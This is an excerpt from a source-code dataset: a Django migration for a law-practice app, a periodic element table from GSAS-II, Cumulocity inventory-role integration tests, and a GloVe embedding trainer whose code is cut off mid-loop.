| Column | Type | Range / values |
|---|---|---|
| hexsha | string | length 40 |
| size | int64 | 3 to 1.03M |
| ext | string | 10 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | length 3 to 972 |
| max_stars_repo_name | string | length 6 to 130 |
| max_stars_repo_head_hexsha | string | length 40 to 78 |
| max_stars_repo_licenses | list | length 1 to 10 |
| max_stars_count | int64 (nullable) | 1 to 191k |
| max_stars_repo_stars_event_min_datetime | string (nullable) | length 24 |
| max_stars_repo_stars_event_max_datetime | string (nullable) | length 24 |
| max_issues_repo_path | string | length 3 to 972 |
| max_issues_repo_name | string | length 6 to 130 |
| max_issues_repo_head_hexsha | string | length 40 to 78 |
| max_issues_repo_licenses | list | length 1 to 10 |
| max_issues_count | int64 (nullable) | 1 to 116k |
| max_issues_repo_issues_event_min_datetime | string (nullable) | length 24 |
| max_issues_repo_issues_event_max_datetime | string (nullable) | length 24 |
| max_forks_repo_path | string | length 3 to 972 |
| max_forks_repo_name | string | length 6 to 130 |
| max_forks_repo_head_hexsha | string | length 40 to 78 |
| max_forks_repo_licenses | list | length 1 to 10 |
| max_forks_count | int64 (nullable) | 1 to 105k |
| max_forks_repo_forks_event_min_datetime | string (nullable) | length 24 |
| max_forks_repo_forks_event_max_datetime | string (nullable) | length 24 |
| content | string | length 3 to 1.03M |
| avg_line_length | float64 | 1.13 to 941k |
| max_line_length | int64 | 2 to 941k |
| alphanum_fraction | float64 | 0 to 1 |
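Each record below is one source file: the repository metadata columns come first, the raw file text sits in `content`, and the per-file statistics (`avg_line_length`, `max_line_length`, `alphanum_fraction`) close the record. As a minimal sketch of how a dataset with this schema could be consumed, assuming the Hugging Face `datasets` library and a placeholder dataset ID (the real ID is not given in this excerpt):

```python
from datasets import load_dataset

# "org/code-dataset" is a placeholder; substitute the actual dataset ID.
ds = load_dataset("org/code-dataset", split="train", streaming=True)

for row in ds:
    # Repository metadata plus the raw file text.
    print(row["max_stars_repo_name"], row["max_stars_repo_path"], row["size"])
    source = row["content"]
    break
```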
hexsha: f28123f9b50064f16e58daccff2fb43e69d6ad62 | size: 3,291 | ext: py | lang: Python
max_stars:  path processos/migrations/0001_initial.py | repo stoledo85/sistema_advocacia | head 81a981a5f47de8a257f547973e51537e9af3d541 | licenses ["MIT"] | count null | event min null | event max null
max_issues: path processos/migrations/0001_initial.py | repo stoledo85/sistema_advocacia | head 81a981a5f47de8a257f547973e51537e9af3d541 | licenses ["MIT"] | count null | event min null | event max null
max_forks:  path processos/migrations/0001_initial.py | repo stoledo85/sistema_advocacia | head 81a981a5f47de8a257f547973e51537e9af3d541 | licenses ["MIT"] | count null | event min null | event max null
# Generated by Django 3.1.1 on 2020-09-22 16:37
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('clientes', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Processo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('area_atuacao', models.CharField(max_length=50, verbose_name='Area de Atuação')),
('obj_acao', models.CharField(max_length=50, verbose_name='Objetivo da Ação')),
('cnj', models.CharField(max_length=20, verbose_name='Nro do Processo(CNJ)')),
('local_tramite', models.CharField(max_length=15, verbose_name='Tramite')),
('tramite_uf', models.CharField(choices=[('AC', 'Acre'), ('AL', 'Alagoas'), ('AP', 'Amapá'), ('AM', 'Amazonas'), ('BA', 'Bahia'), ('CE', 'Ceará'), ('DF', 'Distrito Federal'), ('ES', 'Espírito Santo'), ('GO', 'Goiás'), ('MA', 'Maranhão'), ('MT', 'Mato Grosso'), ('MS', 'Mato Grosso do Sul'), ('MG', 'Minas Gerais'), ('PA', 'Pará'), ('PB', 'Paraíba'), ('PR', 'Paraná'), ('PE', 'Pernambuco'), ('PI', 'Piauí'), ('RJ', 'Rio de Janeiro'), ('RN', 'Rio Grande do Norte'), ('RS', 'Rio Grande do Sul'), ('RO', 'Rondônia'), ('RR', 'Roraima'), ('SC', 'Santa Catarina'), ('SP', 'São Paulo'), ('SE', 'Sergipe'), ('TO', 'Tocantins')], max_length=2, verbose_name='UF')),
('nro_processo', models.CharField(max_length=20, verbose_name='Processo')),
('dt_contratacao', models.DateField(verbose_name='Data da Contratação')),
('dt_encerramento', models.DateField(verbose_name='Data de Encerramento')),
('dt_trans_julgado', models.DateField(verbose_name='Data Trânsito de Julgado')),
('dt_execucao', models.DateField(verbose_name='Data de Execução')),
('dt_sentenca', models.DateField(verbose_name='Data da Sentença')),
('vlr_causa', models.DecimalField(decimal_places=2, max_digits=5, verbose_name='Valor da Causa')),
('pedido', models.CharField(max_length=50, verbose_name='Pedido')),
('obs', models.TextField(verbose_name='Obs')),
('advogado', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to=settings.AUTH_USER_MODEL, verbose_name='Advogado Responsável')),
('cliente', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='clientes.cliente', verbose_name='Cliente')),
],
),
migrations.CreateModel(
name='faseProcesso',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tipo_fase_processo', models.CharField(max_length=50, verbose_name='Tipo')),
('desc', models.TextField(verbose_name='Descrição')),
('processo', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='processos.processo', verbose_name='Processo')),
],
),
]
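# Editor's note (not part of the original file): an initial migration like this
# is normally applied with Django's management command, e.g.:
#   python manage.py migrate processos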
avg_line_length: 65.82 | max_line_length: 670 | alphanum_fraction: 0.611668

hexsha: 7c202a933f1ae200d9e425d8953a8a11fcf1d1d3 | size: 15,141 | ext: py | lang: Python
max_stars:  path Xerus/GSASII/ElementTable.py | repo pedrobcst/Xerus | head 09df088e0207176df0d20715e1c9778d09d28250 | licenses ["MIT"] | count 18 | event min 2021-12-10T03:05:49.000Z | event max 2022-03-25T15:48:35.000Z
max_issues: path Xerus/GSASII/ElementTable.py | repo pedrobcst/Xerus | head 09df088e0207176df0d20715e1c9778d09d28250 | licenses ["MIT"] | count 14 | event min 2022-02-24T11:09:26.000Z | event max 2022-03-30T07:42:17.000Z
max_forks:  path Xerus/GSASII/ElementTable.py | repo pedrobcst/Xerus | head 09df088e0207176df0d20715e1c9778d09d28250 | licenses ["MIT"] | count 1 | event min 2022-02-25T16:26:54.000Z | event max 2022-02-25T16:26:54.000Z
# -*- coding: utf-8 -*-
'''
*ElementTable: Periodic Table Data*
-----------------------------------
Element table data for building periodic table with valences & JMOL colors.
Need these in case we go back to this periodic table coloring scheme.
Defines list ``ElTable`` which contains all defined oxidation states for each
element, the location in the table, an element name, a color, a size and a
second color.
'''
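# Editor's note (not part of the original file): each ElTable / MagElTable entry
# unpacks as (valence symbols, column, row, element name, block colour, size,
# JMOL colour), e.g.:
#   for symbols, col, row, name, color, size, jmol in ElTable: ...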
REcolor = (128, 128, 255)
Metcolor = (192, 192, 192)
Noblecolor = (255, 128, 255)
Alkcolor = (255, 255, 128)
AlkEcolor = (255, 128, 0)
SemMetcolor = (128, 255, 0)
NonMetcolor = (0, 255, 255)
White = (255, 255, 255)
ElTable = [
(["H","H-1","D","D-1","T","T-1"],0,0, "Hydrogen", White, 0.0000,(255,255,255)),
(["D","D-1"], -1,-1, "Deuterium", White, 0.0000,(255,255,255)),
(["T","T-1"], -1,-1, "Tritium", White, 0.0000,(255,255,255)),
(["He",], 17,0, "Helium", Noblecolor, 0.0000,(217,255,255)),
(["Li","Li+1"], 0,1, "Lithium", Alkcolor, 0.0004,(204,128,255)),
(["Be","Be+2"], 1,1, "Beryllium", AlkEcolor, 0.0006,(194,255,0)),
(["B",], 12,1, "Boron", NonMetcolor, 0.0012,(255,181,181)),
(["C",], 13,1, "Carbon", NonMetcolor, 0.0018,(144,144,144)),
(["N",], 14,1, "Nitrogen", NonMetcolor, 0.0030,(48,80,248)),
(["O","O-1","O-2"], 15,1, "Oxygen", NonMetcolor, 0.0042,(255,13,13)),
(["F","F-1"], 16,1, "Fluorine", NonMetcolor, 0.0054,(144,224,80)),
(["Ne",], 17,1, "Neon", Noblecolor, 0.0066,(179,227,245)),
(["Na","Na+1"], 0,2, "Sodium", Alkcolor, 0.0084,(171,92,242)),
(["Mg","Mg+2"], 1,2, "Magnesium", AlkEcolor, 0.0110,(138,255,0)),
(["Al","Al+3"], 12,2, "Aluminum", SemMetcolor, 0.0125,(191,166,166)),
(["Si","Si+4"], 13,2, "Silicon", NonMetcolor, 0.0158,(240,200,160)),
(["P",], 14,2, "Phosphorus", NonMetcolor, 0.0180,(255,128,0)),
(["S",], 15,2, "Sulphur", NonMetcolor, 0.0210,(255,255,48)),
(["Cl","Cl-1"], 16,2, "Chlorine", NonMetcolor, 0.0250,(31,240,31)),
(["Ar",], 17,2, "Argon", Noblecolor, 0.0285,(128,209,227)),
(["K","K+1"], 0,3, "Potassium", Alkcolor, 0.0320,(61,255,0)),
(["Ca","Ca+2"], 1,3, "Calcium", AlkEcolor, 0.0362,(61,255,0)),
(["Sc","Sc+3"], 2,3, "Scandium", Metcolor, 0.0410,(230,230,230)),
(["Ti","Ti+2","Ti+3","Ti+4"], 3,3, "Titanium", Metcolor, 0.0460,(191,194,199)),
(["V","V+2","V+3","V+5"], 4,3, "Vanadium", Metcolor, 0.0510,(166,166,171)),
(["Cr","Cr+2","Cr+3"], 5,3, "Chromium", Metcolor, 0.0560,(138,153,199)),
(["Mn","Mn+2","Mn+3","Mn+4"], 6,3, "Manganese", Metcolor, 0.0616,(156,122,199)),
(["Fe","Fe+2","Fe+3"], 7,3, "Iron", Metcolor, 0.0680,(224,102,51)),
(["Co","Co+2","Co+3"], 8,3, "Cobalt", Metcolor, 0.0740,(240,144,160)),
(["Ni","Ni+2","Ni+3"], 9,3, "Nickel", Metcolor, 0.0815,(80,208,80)),
(["Cu","Cu+1","Cu+2"], 10,3, "Copper", Metcolor, 0.0878,(200,128,51)),
(["Zn","Zn+2"], 11,3, "Zinc", Metcolor, 0.0960,(125,128,176)),
(["Ga","Ga+3"], 12,3, "Gallium", SemMetcolor, 0.104,(194,143,143)),
(["Ge","Ge+4"], 13,3, "Germanium", SemMetcolor, 0.114,(102,143,143)),
(["As",], 14,3, "Arsenic", NonMetcolor, 0.120,(255,0,255)),
(["Se",], 15,3, "Selenium", NonMetcolor, 0.132,(255,161,0)),
(["Br","Br-1"], 16,3, "Bromine", NonMetcolor, 0.141,(166,41,41)),
(["Kr",], 17,3, "Krypton", Noblecolor, 0.150,(92,184,209)),
(["Rb","Rb+1"], 0,4, "Rubidium", Alkcolor, 0.159,(112,46,176)),
(["Sr","Sr+2"], 1,4, "Strontium", AlkEcolor, 0.171,(0,255,0)),
(["Y","Y+3"], 2,4, "Yittrium", Metcolor, 0.180,(148,255,255)),
(["Zr","Zr+4"], 3,4, "Zirconium", Metcolor, 0.192,(148,224,224)),
(["Nb","Nb+3","Nb+5"], 4,4, "Niobium", Metcolor, 0.204,(115,194,201)),
(["Mo","Mo+3","Mo+5","Mo+6"], 5,4, "Molybdenium", Metcolor, 0.216,(84,181,181)),
(["Tc",], 6,4, "Technetium", Metcolor, 0.228,(59,158,158)),
(["Ru","Ru+3","Ru+4"], 7,4, "Ruthenium", Metcolor, 0.246,(36,143,143)),
(["Rh","Rh+3","Rh+4"], 8,4, "Rhodium", Metcolor, 0.258,(10,125,140)),
(["Pd","Pd+2","Pd+4"], 9,4, "Palladium", Metcolor, 0.270,(0,105,133)),
(["Ag","Ag+1","Ag+2"], 10,4, "Silver", Metcolor, 0.285,(192,192,192)),
(["Cd","Cd+2"], 11,4, "Cadmium", Metcolor, 0.300,(255,217,143)),
(["In","In+3"], 12,4, "Indium", SemMetcolor, 0.318,(166,117,115)),
(["Sn","Sn+2","Sn+4"], 13,4, "Tin", SemMetcolor, 0.330,(102,128,128)),
(["Sb","Sb+3","Sb+5"], 14,4, "Antimony", SemMetcolor, 0.348,(158,99,181)),
(["Te",], 15,4, "Tellurium", NonMetcolor, 0.363,(212,122,0)),
(["I","I-1"], 16,4, "Iodine", NonMetcolor, 0.384,(148,0,148)),
(["Xe",], 17,4, "Xenon", Noblecolor, 0.396,(66,158,176)),
(["Cs","Cs+1"], 0,5, "Caesium", Alkcolor, 0.414,(87,23,143)),
(["Ba","Ba+2"], 1,5, "Barium", AlkEcolor, 0.438,(0,201,0)),
(["La","La+3"], 2,5, "Lanthanium", Metcolor, 0.456,(112,212,255)),
(["Ce","Ce+3","Ce+4"], 3.5,6.5, "Cerium", REcolor, 0.474,(255,255,199)),
(["Pr","Pr+3","Pr+4"], 4.5,6.5, "Praseodymium",REcolor, 0.492,(217,255,199)),
(["Nd","Nd+3"], 5.5,6.5, "Neodymium", REcolor, 0.516,(199,255,199)),
(["Pm","Pm+3"], 6.5,6.5, "Promethium", REcolor, 0.534,(163,255,199)),
(["Sm","Sm+3"], 7.5,6.5, "Samarium", REcolor, 0.558,(143,255,199)),
(["Eu","Eu+2","Eu+3"], 8.5,6.5, "Europium", REcolor, 0.582,(97,255,199)),
(["Gd","Gd+3"], 9.5,6.5, "Gadolinium", REcolor, 0.610,(69,255,199)),
(["Tb","Tb+3"], 10.5,6.5, "Terbium", REcolor, 0.624,(48,255,199)),
(["Dy","Dy+3"], 11.5,6.5, "Dysprosium", REcolor, 0.648,(31,255,199)),
(["Ho","Ho+3"], 12.5,6.5, "Holmium", REcolor, 0.672,(0,255,156)),
(["Er","Er+3"], 13.5,6.5, "Erbium", REcolor, 0.696,(0,230,117)),
(["Tm","Tm+3"], 14.5,6.5, "Thulium", REcolor, 0.723,(0,212,82)),
(["Yb","Yb+2","Yb+3"], 15.5,6.5, "Ytterbium", REcolor, 0.750,(0,191,56)),
(["Lu","Lu+3"], 16.5,6.5, "Lutetium", REcolor, 0.780,(0,171,36)),
(["Hf","Hf+4"], 3,5, "Hafnium", Metcolor, 0.804,(77,194,255)),
(["Ta","Ta+5"], 4,5, "Tantalum", Metcolor, 0.834,(77,166,255)),
(["W","W+6"], 5,5, "Tungsten", Metcolor, 0.864,(33,148,214)),
(["Re",], 6,5, "Rhenium", Metcolor, 0.900,(38,125,171)),
(["Os","Os+4"], 7,5, "Osmium", Metcolor, 0.919,(38,102,150)),
(["Ir","Ir+3","Ir+4"], 8,5, "Iridium", Metcolor, 0.948,(23,84,135)),
(["Pt","Pt+2","Pt+4"], 9,5, "Platinium", Metcolor, 0.984,(208,208,224)),
(["Au","Au+1","Au+3"], 10,5, "Gold", Metcolor, 1.014,(255,209,35)),
(["Hg","Hg+1","Hg+2"], 11,5, "Mercury", Metcolor, 1.046,(184,184,208)),
(["Tl","Tl+1","Tl+3"], 12,5, "Thallium", SemMetcolor, 1.080,(166,84,77)),
(["Pb","Pb+2","Pb+4"], 13,5, "Lead", SemMetcolor, 1.116,(87,89,97)),
(["Bi","Bi+3","Bi+5"], 14,5, "Bismuth", SemMetcolor, 1.149,(158,79,181)),
(["Po",], 15,5, "Polonium", SemMetcolor, 1.189,(171,92,0)),
(["At",], 16,5, "Astatine", NonMetcolor, 1.224,(117,79,69)),
(["Rn",], 17,5, "Radon", Noblecolor, 1.260,(66,130,150)),
(["Fr",], 0,6, "Francium", Alkcolor, 1.296,(66,0,102)),
(["Ra","Ra+2"], 1,6, "Radium", AlkEcolor, 1.332,(0,125,0)),
(["Ac","Ac+3"], 2,6, "Actinium", Metcolor, 1.374,(112,171,250)),
(["Th","Th+4"], 3.5,7.5, "Thorium", REcolor, 1.416,(0,186,255)),
(["Pa",], 4.5,7.5, "Protactinium",REcolor, 1.458,(0,161,255)),
(["U","U+3","U+4","U+6"], 5.5,7.5, "Uranium", REcolor, 1.470,(0,143,255)),
(["Np","Np+3","Np+4","Np+6"], 6.5,7.5, "Neptunium", REcolor, 1.536,(0,128,255)),
(["Pu","Pu+3","Pu+4","Pu+6"], 7.5,7.5, "Plutonium", REcolor, 1.584,(0,107,255)),
(["Am",], 8.5,7.5, "Americium", REcolor, 1.626,(84,92,242)),
(["Cm",], 9.5,7.5, "Curium", REcolor, 1.669,(120,92,227)),
(["Bk",], 10.5,7.5, "Berkelium", REcolor, 1.716,(138,79,227)),
(["Cf",], 11.5,7.5, "Californium", REcolor, 1.764,(161,54,212)),
(["Va",], 13.5,7.5, "Vacancy", White, 0.000,(255,255,255)),
(["Q","QA","QB","QC","QD"], 14.5,7.5, "Special form factor", REcolor, 0.000,(161,54,212)),
(["None",], 15.5,7.5, "No element choice",REcolor, 0.000,(161,54,212)),
]
MagElTable = [
(["Sc","Sc+1","Sc+2","Sc+3"], 2,3, "Scandium", Metcolor, 0.0410,(230,230,230)),
(["Ti","Ti+2","Ti+3"], 3,3, "Titanium", Metcolor, 0.0460,(191,194,199)),
(["V","V+1","V+2","V+3"], 4,3, "Vanadium", Metcolor, 0.0510,(166,166,171)),
(["Cr","Cr+1","Cr+2","Cr+3","Cr+4"], 5,3, "Chromium", Metcolor, 0.0560,(138,153,199)),
(["Mn","Mn+1","Mn+2","Mn+3","Mn+4"], 6,3, "Manganese", Metcolor, 0.0616,(156,122,199)),
(["Fe","Fe+1","Fe+2","Fe+3","Fe+4"], 7,3, "Iron", Metcolor, 0.0680,(224,102,51)),
(["Co","Co+1","Co+2","Co+3","Co+4"], 8,3, "Cobalt", Metcolor, 0.0740,(240,144,160)),
(["Ni","Ni+1","Ni+2","Ni+3","Ni+4"], 9,3, "Nickel", Metcolor, 0.0815,(80,208,80)),
(["Cu","Cu+1","Cu+2","Cu+3","Cu+4"], 10,3, "Copper", Metcolor, 0.0878,(200,128,51)),
(["Y"], 2,4, "Yittrium", Metcolor, 0.180,(148,255,255)),
(["Zr","Zr+1"], 3,4, "Zirconium", Metcolor, 0.192,(148,224,224)),
(["Nb","Nb+1"], 4,4, "Niobium", Metcolor, 0.204,(115,194,201)),
(["Mo","Mo+1"], 5,4, "Molybdenium", Metcolor, 0.216,(84,181,181)),
(["Tc","Tc+1"], 6,4, "Technetium", Metcolor, 0.228,(59,158,158)),
(["Ru","Ru+1"], 7,4, "Ruthenium", Metcolor, 0.246,(36,143,143)),
(["Rh","Rh+1"], 8,4, "Rhodium", Metcolor, 0.258,(10,125,140)),
(["Pd","Pd+1"], 9,4, "Palladium", Metcolor, 0.270,(0,105,133)),
#NB: zero valent atoms are copied from lowest valent ion for many of these
(["Ce","Ce+2"], 3.5,6.5, "Cerium", REcolor, 0.474,(255,255,199)),
(["Nd","Nd+2"], 5.5,6.5, "Neodymium", REcolor, 0.516,(199,255,199)),
(["Sm","Sm+2","Sm+3"], 7.5,6.5, "Samarium", REcolor, 0.558,(143,255,199)),
(["Eu","Eu+2","Eu+3"], 8.5,6.5, "Europium", REcolor, 0.582,(97,255,199)),
(["Gd","Gd+2","Gd+3"], 9.5,6.5, "Gadolinium", REcolor, 0.610,(69,255,199)),
(["Tb","Tb+2","Tb+3"], 10.5,6.5, "Terbium", REcolor, 0.624,(48,255,199)),
(["Dy","Dy+2","Dy+3"], 11.5,6.5, "Dysprosium", REcolor, 0.648,(31,255,199)),
(["Ho","Ho+2","Ho+3"], 12.5,6.5, "Holmium", REcolor, 0.672,(0,255,156)),
(["Er","Er+2","Er+3"], 13.5,6.5, "Erbium", REcolor, 0.696,(0,230,117)),
(["Tm","Tm+2","Tm+3"], 14.5,6.5, "Thulium", REcolor, 0.723,(0,212,82)),
(["Yb","Yb+2","Yb+3"], 15.5,6.5, "Ytterbium", REcolor, 0.750,(0,191,56)),
(["Hf","Hf+2","Hf+3"], 3,5, "Hafnium", Metcolor, 0.804,(77,194,255)),
(["Ta","Ta+2","Ta+3","Ta+4"], 4,5, "Tantalum", Metcolor, 0.834,(77,166,255)),
(["W","W+1","W+2","W+3","W+4","W+5"], 5,5, "Tungsten", Metcolor, 0.864,(33,148,214)),
(["Re","Re+1","Re+2","Re+3","Re+4","Re+5","Re+6"], 6,5, "Rhenium", Metcolor, 0.900,(38,125,171)),
(["Os","Os+1","Os+2","Os+3","Os+4","Os+5","Os+6","Os+7"], 7,5, "Osmium", Metcolor, 0.919,(38,102,150)),
(["Ir","Ir+1","Ir+2","Ir+3","Ir+4","Ir+5","Ir+6"], 8,5, "Iridium", Metcolor, 0.948,(23,84,135)),
(["Pt","Pt+1","Pt+2","Pt+3","Pt+4","Pt+5","Pt+6"], 9,5, "Platinium", Metcolor, 0.984,(208,208,224)),
(["Au","Au+1","Au+2","Au+3","Au+4","Au+5"], 10,5, "Gold", Metcolor, 1.014,(255,209,35)),
(["U","U+3","U+4","U+5"], 5.5,7.5, "Uranium", REcolor, 1.470,(0,143,255)),
(["Np","Np+3","Np+4","Np+5","Np+6"], 6.5,7.5, "Neptunium", REcolor, 1.536,(0,128,255)),
(["Pu","Pu+3","Pu+4","Pu+5","Pu+6"], 7.5,7.5, "Plutonium", REcolor, 1.584,(0,107,255)),
(["Am","Am+2","Am+3","Am+4","Am+5","Am+6","Am+7"], 8.5,7.5, "Americium", REcolor, 1.626,(84,92,242)),
]
avg_line_length: 89.064706 | max_line_length: 121 | alphanum_fraction: 0.389472

hexsha: d2c48a8d24ccc7a5520959fd4673b2fb05bb229f | size: 4,378 | ext: py | lang: Python
max_stars:  path integration_tests/test_inventoryroles.py | repo chisou/cumulocity-python-api | head f420b8ad2ec7735484db94b70ad6f5485585ddbb | licenses ["Apache-2.0"] | count 9 | event min 2021-02-16T08:53:08.000Z | event max 2022-02-15T11:58:19.000Z
max_issues: path integration_tests/test_inventoryroles.py | repo chisou/cumulocity-python-api | head f420b8ad2ec7735484db94b70ad6f5485585ddbb | licenses ["Apache-2.0"] | count 4 | event min 2021-04-20T12:26:41.000Z | event max 2022-02-09T09:52:11.000Z
max_forks:  path integration_tests/test_inventoryroles.py | repo chisou/cumulocity-python-api | head f420b8ad2ec7735484db94b70ad6f5485585ddbb | licenses ["Apache-2.0"] | count 3 | event min 2021-04-26T23:05:32.000Z | event max 2021-12-09T14:13:58.000Z
# Copyright (c) 2020 Software AG,
# Darmstadt, Germany and/or Software AG USA Inc., Reston, VA, USA,
# and/or its subsidiaries and/or its affiliates and/or their licensors.
# Use, reproduction, transfer, publication or disclosure is prohibited except
# as specifically provided for in your License Agreement with Software AG.
import pytest
from c8y_api.model import User, InventoryRole, Permission, ReadPermission, WritePermission, AnyPermission
from tests import RandomNameGenerator
def test_CRUD(live_c8y):
"""Verify that object-oriented create, update and delete works."""
permissions = [ReadPermission(scope=Permission.Scope.ANY),
WritePermission(scope=Permission.Scope.MEASUREMENT, type='c8y_Custom'),
AnyPermission(scope=Permission.Scope.ALARM, type='*')]
role = InventoryRole(name=RandomNameGenerator.random_name(2), description='SomeDescription',
permissions=permissions)
# 1) create role
role.c8y = live_c8y
role = role.create()
# -> ids are set
assert role.id
assert all(p.id for p in role.permissions)
# 2) update the role
role.description = 'new description'
del role.permissions[0]
updated_role = role.update()
# -> updated role has all the changed fields
assert updated_role.id == role.id
assert updated_role.description == role.description
# -> the ID of the permissions should persist
assert {p.id for p in updated_role.permissions} == {p.id for p in role.permissions}
# 3) delete the role
role.delete()
# -> verify that the role is gone
# (unfortunately this throws a SyntaxError instead of a KeyError)
with pytest.raises(SyntaxError):
live_c8y.inventory_roles.get(role.id)
def test_CRUD2(live_c8y):
"""Verify that API-based create, update and delete works."""
permissions = [ReadPermission(scope=Permission.Scope.ANY),
WritePermission(scope=Permission.Scope.MEASUREMENT, type='c8y_Custom'),
AnyPermission(scope=Permission.Scope.ALARM, type='*')]
role = InventoryRole(name=RandomNameGenerator.random_name(2), description='SomeDescription',
permissions=permissions)
# 1) create role
live_c8y.inventory_roles.create(role)
# 2) get all roles
all_roles = live_c8y.inventory_roles.get_all()
# -> created role can be found
created_role = next(filter(lambda r: r.name == role.name, all_roles))
# 3) can be updated
created_role.description = 'new description'
live_c8y.inventory_roles.update(created_role)
# 4) directly grab from DB
updated_role = live_c8y.inventory_roles.get(created_role.id)
# -> it was updated
assert updated_role.description == created_role.description
# 5) delete the role
live_c8y.inventory_roles.delete(created_role.id)
# -> verify that the role is gone
# (unfortunately this throws a SyntaxError instead of a KeyError)
with pytest.raises(SyntaxError):
live_c8y.inventory_roles.get(created_role.id)
def test_assignments(live_c8y, sample_device, factory):
"""Verify that inventory roles can be assigned, retrieved and unassigned."""
username = 'user_' + RandomNameGenerator.random_name(2)
role1_name = 'role_' + RandomNameGenerator.random_name(2)
role2_name = 'role_' + RandomNameGenerator.random_name(2)
# create a user
user = User(username=username, email='test@test.com')
user = factory(user)
# create inventory roles
role1 = InventoryRole(name=role1_name, permissions=[
ReadPermission(scope=Permission.Scope.ALARM),
WritePermission(scope=Permission.Scope.AUDIT)])
role1 = factory(role1)
role2 = InventoryRole(name=role2_name, permissions=[
ReadPermission(scope=Permission.Scope.ANY),
WritePermission(scope=Permission.Scope.MEASUREMENT)])
role2 = factory(role2)
# assign inventory roles
user.assign_inventory_roles(sample_device.id, role1, role2)
# verify that roles are assigned
assigned_roles = user.retrieve_inventory_role_assignments()
assert {role1_name, role2_name} == {x.name for x in assigned_roles[0].roles}
# delete the assignment
user.unassign_inventory_roles(assigned_roles[0].id)
# verify that the assignment is gone
assert not user.retrieve_inventory_role_assignments()
avg_line_length: 38.403509 | max_line_length: 105 | alphanum_fraction: 0.711055

hexsha: b46c13f26bf8956217fc51a9b3c3de3ce8c99e85 | size: 12,018 | ext: py | lang: Python
max_stars:  path src/nlp_class2/glove.py | repo JouniVatanen/NLP-and-Deep-Learning | head 2fddcc2c39787713d33d17e80565de4ed073ca60 | licenses ["MIT"] | count 1 | event min 2020-05-24T06:55:31.000Z | event max 2020-05-24T06:55:31.000Z
max_issues: path Machine Learning/nlp_class2/glove.py | repo Ashleshk/Machine-Learning-Data-Science-Deep-Learning | head 03357ab98155bf73b8f1d2fd53255cc16bea2333 | licenses ["MIT"] | count null | event min null | event max null
max_forks:  path Machine Learning/nlp_class2/glove.py | repo Ashleshk/Machine-Learning-Data-Science-Deep-Learning | head 03357ab98155bf73b8f1d2fd53255cc16bea2333 | licenses ["MIT"] | count 1 | event min 2020-03-16T13:11:14.000Z | event max 2020-03-16T13:11:14.000Z
# Course URL:
# https://deeplearningcourses.com/c/natural-language-processing-with-deep-learning-in-python
# https://udemy.com/natural-language-processing-with-deep-learning-in-python
from __future__ import print_function, division
from builtins import range
# Note: you may need to update your version of future
# sudo pip install -U future
import os
import json
import numpy as np
import matplotlib.pyplot as plt
from datetime import datetime
from sklearn.utils import shuffle
from util import find_analogies
import sys
sys.path.append(os.path.abspath('..'))
from rnn_class.util import get_wikipedia_data
from rnn_class.brown import get_sentences_with_word2idx_limit_vocab, get_sentences_with_word2idx
# using ALS, what's the least # files to get correct analogies?
# use this for word2vec training to make it faster
# first tried 20 files --> not enough
# how about 30 files --> some correct but still not enough
# 40 files --> half right but 50 is better
class Glove:
def __init__(self, D, V, context_sz):
self.D = D
self.V = V
self.context_sz = context_sz
def fit(self, sentences, cc_matrix=None, learning_rate=1e-4, reg=0.1, xmax=100, alpha=0.75, epochs=10, gd=False):
# build co-occurrence matrix
# paper calls it X, so we will call it X, instead of calling
# the training data X
# TODO: would it be better to use a sparse matrix?
t0 = datetime.now()
V = self.V
D = self.D
if not os.path.exists(cc_matrix):
X = np.zeros((V, V))
N = len(sentences)
print("number of sentences to process:", N)
it = 0
for sentence in sentences:
it += 1
if it % 10000 == 0:
print("processed", it, "/", N)
n = len(sentence)
for i in range(n):
# i is not the word index!!!
# j is not the word index!!!
# i just points to which element of the sequence (sentence) we're looking at
wi = sentence[i]
start = max(0, i - self.context_sz)
end = min(n, i + self.context_sz)
# we can either choose only one side as context, or both
# here we are doing both
# make sure "start" and "end" tokens are part of some context
# otherwise their f(X) will be 0 (denominator in bias update)
if i - self.context_sz < 0:
points = 1.0 / (i + 1)
X[wi,0] += points
X[0,wi] += points
if i + self.context_sz > n:
points = 1.0 / (n - i)
X[wi,1] += points
X[1,wi] += points
# left side
for j in range(start, i):
wj = sentence[j]
points = 1.0 / (i - j) # this is +ve
X[wi,wj] += points
X[wj,wi] += points
# right side
for j in range(i + 1, end):
wj = sentence[j]
points = 1.0 / (j - i) # this is +ve
X[wi,wj] += points
X[wj,wi] += points
# save the cc matrix because it takes forever to create
np.save(cc_matrix, X)
else:
X = np.load(cc_matrix)
print("max in X:", X.max())
# weighting
fX = np.zeros((V, V))
fX[X < xmax] = (X[X < xmax] / float(xmax)) ** alpha
fX[X >= xmax] = 1
print("max in f(X):", fX.max())
# target
logX = np.log(X + 1)
print("max in log(X):", logX.max())
print("time to build co-occurrence matrix:", (datetime.now() - t0))
# initialize weights
W = np.random.randn(V, D) / np.sqrt(V + D)
b = np.zeros(V)
U = np.random.randn(V, D) / np.sqrt(V + D)
c = np.zeros(V)
mu = logX.mean()
costs = []
sentence_indexes = range(len(sentences))
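        # The loop below minimizes the weighted least-squares GloVe objective
        #   J = sum_{i,j} fX[i,j] * (W[i].dot(U[j]) + b[i] + c[j] + mu - logX[i,j])**2
        # using either full-batch gradient descent (gd=True) or alternating least squares.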
for epoch in range(epochs):
delta = W.dot(U.T) + b.reshape(V, 1) + c.reshape(1, V) + mu - logX
cost = ( fX * delta * delta ).sum()
costs.append(cost)
print("epoch:", epoch, "cost:", cost)
if gd:
# gradient descent method
# update W
# oldW = W.copy()
for i in range(V):
# for j in range(V):
# W[i] -= learning_rate*fX[i,j]*(W[i].dot(U[j]) + b[i] + c[j] + mu - logX[i,j])*U[j]
W[i] -= learning_rate*(fX[i,:]*delta[i,:]).dot(U)
W -= learning_rate*reg*W
# print "updated W"
# update b
for i in range(V):
# for j in range(V):
# b[i] -= learning_rate*fX[i,j]*(W[i].dot(U[j]) + b[i] + c[j] + mu - logX[i,j])
b[i] -= learning_rate*fX[i,:].dot(delta[i,:])
